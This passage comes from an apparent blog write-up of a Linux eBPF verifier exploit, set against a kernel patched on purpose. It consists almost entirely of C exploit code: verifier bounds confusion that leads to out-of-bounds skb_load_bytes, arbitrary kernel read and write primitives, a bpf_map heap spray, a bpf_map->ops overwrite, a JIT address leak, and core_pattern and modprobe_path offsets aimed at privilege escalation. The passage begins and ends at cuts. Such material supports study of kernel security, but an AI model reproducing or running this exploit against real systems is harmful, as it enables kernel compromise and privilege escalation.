      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
